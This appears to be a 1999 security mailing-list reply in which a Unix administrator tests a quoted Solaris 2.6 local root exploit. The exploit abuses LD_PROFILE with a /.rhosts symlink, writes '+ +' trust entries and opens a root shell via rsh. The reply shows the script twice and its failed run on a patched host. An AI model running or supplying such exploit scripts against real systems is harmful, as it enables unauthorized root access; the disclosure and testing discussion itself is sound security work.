On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # [EMAIL PROTECTED] 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i
Not on my system:
[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# [EMAIL PROTECTED] 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
[brock@agfa brock]$ ./r00t.sh
PID TTY TIME CMD
22565 pts/5 0:00 r00t.sh
22484 pts/5 0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[brock@agfa brock]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
[EMAIL PROTECTED]
